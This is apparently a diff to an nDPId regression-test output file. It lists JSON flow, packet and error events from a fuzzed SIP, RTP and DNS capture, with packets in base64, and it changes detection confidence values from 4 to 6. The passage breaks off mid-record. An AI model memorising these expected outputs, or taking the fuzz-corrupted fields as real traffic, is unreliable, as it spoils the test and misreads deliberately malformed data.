00600{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":631,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":236,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470985504,"flow_last_seen":1120470985504,"flow_idle_time":200000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1120470985504,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"214.242.33.36","src_port":30000,"dst_port":40392,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00687{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":631,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":236,"flow_packet_id":1,"flow_last_seen":1120470985504,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1120470985504,"pkt":"ADBUADRWAODtAW69CABFAADIbAMAAIARFmHAqAEC1vIhJHUwncgAtLaDgAhvtQAACTg3lstx6urs5ueUkJOXlZGWbOyVlOD46O7hzXXbxsfz\/OLg5ufawPH4wk3N8Obu7+Pv6unk4fj\/29jZ1\/7l4+Ht7JOXyOrs4vPPUfVQz97J5fLjl5GXkpyRl+jqk5aQlero4svh7+rslJfp6uP+9vbL+OLg5vj99\/LL9ub4+uTs6ZSVlJXp6Ojv7eqWkZOTnJORkpCbk5GXlpaRkJBK6ejp7JWXlw=="} -00656{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":631,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":236,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470985504,"flow_last_seen":1120470985504,"flow_idle_time":200000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1120470985504,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"214.242.33.36","src_port":30000,"dst_port":40392,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}} +00656{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":631,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":236,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470985504,"flow_last_seen":1120470985504,"flow_idle_time":200000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1120470985504,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"214.242.33.36","src_port":30000,"dst_port":40392,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":632,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":237,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470985511,"flow_last_seen":1120470985511,"flow_idle_time":200000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1120470985511,"l3_proto":"ip4","src_ip":"81.168.1.2","dst_ip":"212.242.33.36","src_port":30000,"dst_port":40392,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00687{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":632,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":237,"flow_packet_id":1,"flow_last_seen":1120470985511,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1120470985511,"pkt":"ADBUADRWAODtAb+9CABFAADIbAQAAIARFm9RqAEC1PIhJHUwncgAtIfqgAhvtgAACdg3lstxlpDplp2cmZ6fkpaRle3n9PTy\/CVzAJKehIeEmJGRl52QlJaX6OOU6JaRlp2cn4WEhZ2RkJeV6WOQnZ6EhJOFh4WFmYWYk7+dkpCQ6u\/qkZ2fmYSYnZ6Rk5OU7OD6+Pbh4PTl+OTo6unl9eXi7f7c1VT\/+uiX6JSUkJCV7uXm\/Obu7pWWkZeW7OPpk5Ofm5+Yk5WV7untlJeSkpeV7+qWkA=="} -00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":632,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":237,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470985511,"flow_last_seen":1120470985511,"flow_idle_time":200000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1120470985511,"l3_proto":"ip4","src_ip":"81.168.1.2","dst_ip":"212.242.33.36","src_port":30000,"dst_port":40392,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}} +00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":632,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":237,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470985511,"flow_last_seen":1120470985511,"flow_idle_time":200000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1120470985511,"l3_proto":"ip4","src_ip":"81.168.1.2","dst_ip":"212.242.33.36","src_port":30000,"dst_port":40392,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}} 00199{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":633,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":20992,"global_ts_msec":1120470986363} 00482{"packet_event_id":1,"packet_event_name":"packet","packet_id":633,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":146,"pkt_type":20992,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":146,"pkt_l4_len":0,"thread_ts_msec":1120470985511,"pkt":"ADBUADRWAODtAW69UgBFAACEbAVoAIARFqPAqAEC9PIhJHUxnckAcCyBgMgABjeWy3FCyQfKXvrGAwAAJMMAAAAJAAAGDIHKAAs3lstxAR0xMTg5NDI5Ny00NDMyYTlmOEAxOTIuMTY4LjEuMgYFU0lQUFMAAIHLAAY3lstxEHNlc3Npb24gc2h1dGRvd24AAAE="} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":634,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":231,"flow_packet_id":3,"flow_last_seen":1120470987237,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470987237,"pkt":"ADBUADRWAODtAW69CABFAABIbAYAAIARS0vAqAECwKgBAQsAADUANFW+1AYBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaVR5AmRrAAAhAAE="} -00800{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":634,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470983999,"flow_last_seen":1120470987237,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470987237,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2816,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00800{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":634,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470983999,"flow_last_seen":1120470987237,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470987237,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2816,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00216{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":635,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":52,"global_ts_msec":1120470989238} 00399{"packet_event_id":1,"packet_event_name":"packet","packet_id":635,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120470987237,"pkt":"ADBUADRWAODtAW69CABFAABIbAdtAIARS07AqAECwKgBAQsAADUANFW+1AYBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaVN5AmRrAAAhAAE="} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120470796801,"flow_last_seen":1120470796802,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120470993243,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2797,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120470796801,"flow_last_seen":1120470796802,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120470993243,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2797,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":199,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470798172,"flow_last_seen":1120470806184,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470993243,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2798,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00695{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":637,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":198,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1120470796941,"flow_last_seen":1120470984332,"flow_idle_time":200000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":1065,"flow_tot_l4_payload_len":9266,"flow_avg_l4_payload_len":514,"midstream":0,"thread_ts_msec":1120470993243,"l3_proto":"ip4","src_ip":"212.242.33.35","dst_ip":"192.168.1.2","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} +00695{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":637,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":198,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1120470796941,"flow_last_seen":1120470984332,"flow_idle_time":200000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":1065,"flow_tot_l4_payload_len":9266,"flow_avg_l4_payload_len":514,"midstream":0,"thread_ts_msec":1120470993243,"l3_proto":"ip4","src_ip":"212.242.33.35","dst_ip":"192.168.1.2","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":637,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471001245,"flow_last_seen":1120471001245,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120471001245,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2822,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":637,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":238,"flow_packet_id":1,"flow_last_seen":1120471001245,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1120471001245,"pkt":"ADBUADRWAODtAW69CABFAABEbDoAAIARSxvAqAECwKgBAQsGADUAMBixDAgAAAABEAAAAAAAATEBMAEwAzHvNwdpbi1hZGRyBGFycGEAAAwAAQ=="} -00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":637,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471001245,"flow_last_seen":1120471001245,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120471001245,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2822,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.1?7.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":637,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471001245,"flow_last_seen":1120471001245,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120471001245,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2822,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.1?7.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":639,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471001263,"flow_last_seen":1120471001263,"flow_idle_time":200000,"flow_min_l4_payload_len":464,"flow_max_l4_payload_len":464,"flow_tot_l4_payload_len":464,"flow_avg_l4_payload_len":464,"midstream":0,"thread_ts_msec":1120471001263,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.234.33.35","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01072{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":639,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":239,"flow_packet_id":1,"flow_last_seen":1120471001263,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":506,"pkt_l4_len":472,"thread_ts_msec":1120471001263,"pkt":"ADBUADRWAODtAW69CABFAAHsbDsAAIARFQbAqAEC1OohIxPEE8QB2K3LUkVHSVNURVIgc2lwOnNpcC5jeWJlcmNpdHkuZGsgU0lQLzIuMA0KVmlhOiBTSVAvMi4wL1VEUCAxOTIuMTY4LjEuMjticmFuY2g9ejloRzRiS25wODg4NjAxNi00NGIxNGZlMzE5Mi4xNjguMS4yO3Jwb3J0DQpGcm9tOiA8c2lwOjM1MTA0NzIzQHNpcC5jeWJlcmNpdHkuZGs+O3RhZz04Nzk3MWENClRvOiA8c2lwOjM1MTA0NzIzQHNpcC5jeWJlcmNpdHkuZGs+DQpDYWxsLUlEOiAyOTg1ODFHNy00NjViMDc1MkAyOTg1ODA1MS00NjViMDdiMnMKQ29udGFjdDogcGVsIDxzaXA6MzUxMDQ3MjNAMTkyLjE2OC4xLjI6NTA2MDtsaW5lPTdkMzY1NThmMzEzNjcwNTE+O2V4cGlyZXM9MTIwMDtxBDAuNTAwDQpFeHBpcmVzOiAxMjAwDQpDU2VxOiA1IFJFR0lTVEVSDQpD\/G50ZW50LUxlbmd0aDogMA0KTWF4LUZvcndhYmRzOiA3MA0KVXNlci1BZ2VudDoiTmVybyBTSVBQUyBJUCBQaG9uZSBWZXJzaW9uIDIuOC41MS4xNg0KDQo="} -00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":639,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471001263,"flow_last_seen":1120471001263,"flow_idle_time":200000,"flow_min_l4_payload_len":464,"flow_max_l4_payload_len":464,"flow_tot_l4_payload_len":464,"flow_avg_l4_payload_len":464,"midstream":0,"thread_ts_msec":1120471001263,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.234.33.35","src_port":5060,"dst_port":5060,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} +00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":639,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471001263,"flow_last_seen":1120471001263,"flow_idle_time":200000,"flow_min_l4_payload_len":464,"flow_max_l4_payload_len":464,"flow_tot_l4_payload_len":464,"flow_avg_l4_payload_len":464,"midstream":0,"thread_ts_msec":1120471001263,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.234.33.35","src_port":5060,"dst_port":5060,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} 00217{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":640,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":488,"global_ts_msec":1120471001405} 00981{"packet_event_id":1,"packet_event_name":"packet","packet_id":640,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":522,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":522,"pkt_l4_len":0,"thread_ts_msec":1120471001263,"pkt":"AODtAW69ADBUADRWCABFAEH8AABAADcRijHU8iEjwKgBAhPEE8QB6DHXU0lQLzIuMCA0MDEgVW5hdXRob3JpemVkDQpDYWxsLUlEOiAyOTg1ODE0N4M0NjViMDc1MkAyMTg1ODA1MS00NjViMDdiMg0KQ1MxcTogNSBSRUdJU1RFXw0KRnJvbTogWnNpcDozNTEwNDcyM0BzaXAuY3liZXJjaXR5LmRrPjt0YWc9ODc5NzFhDQpUbzpqPHNpcDozNTEwNDcyM0BzaXAuY3liZXJjaXR5LmRrPjt0YWc9MDAtMDQwNzQtMTcwMWJhYzktMWRhYTBiNGM1DQpWaWE6IFNJJXMALjAvVURQIDE5Mi4xNjguMS4yO3JlY2VpdmVkPTgwLjIzMC4yMTkuNzA7cnBvcnQ9NTA2MDticmFuY2g9ejloRzRiS25wODg4NjAxNi00NGIxNGZlMzE5Mi4xNjguMS4yDQpXV1ctQXV0aGVudGljYXRlOiBEaWdlc3QgcmVhbG09InNpcC5jeWJlcmNpdHkuZGsiLG5vbmNlPSIxNzAxYmFiZDJhZDY3JXMANWU2ZDZiZjE1NDQyYSVzACxvcGFxdWU9IjE3MDFhMTM1MWY3MDc5NSIsc3RhbGU9ZmFsc2UsYWxnb3JpdGhtPU1ENQ0KQ29udGVuLy1MZW5ndGg6IDANCg0K"} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":641,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471001714,"flow_last_seen":1120471001714,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471001714,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2823,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":641,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":240,"flow_packet_id":1,"flow_last_seen":1120471001714,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120471001714,"pkt":"ADBUADRWAODtAW69CABFAABIbDwAAIARSxXAqAECwKgBAQsHADUANKe0ggkBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":641,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471001714,"flow_last_seen":1120471001714,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471001714,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2823,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":641,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471001714,"flow_last_seen":1120471001714,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471001714,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2823,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":642,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":240,"flow_packet_id":2,"flow_last_seen":1120471002706,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120471002706,"pkt":"ADBUADRWAODtAW69CABFAABIbD8gAIARSxTAqAECwKgBAQsHADUANKe0gjgBAAABAAAAAAAABF9zaXAEXXVkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00216{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":643,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":52,"global_ts_msec":1120471004709} 00399{"packet_event_id":1,"packet_event_name":"packet","packet_id":643,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120471002706,"pkt":"ALlUADRWAODtAW69CABFAABIbD4Au4ARSxNYqAECwKgBAQsHADUANKe0ggkBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":644,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":240,"flow_packet_id":3,"flow_last_seen":1120471006712,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120471006712,"pkt":"ADBUADRWAODtAW69CABFAABIbEcAAIARSwrAqAECwKgBAQsHADUANKe0ggkBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAApAAE="} -00800{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":644,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120471001714,"flow_last_seen":1120471006712,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471006712,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2823,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":41,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00800{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":645,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120471001714,"flow_last_seen":1120471010718,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471010718,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2823,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00800{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":644,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120471001714,"flow_last_seen":1120471006712,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471006712,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2823,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": 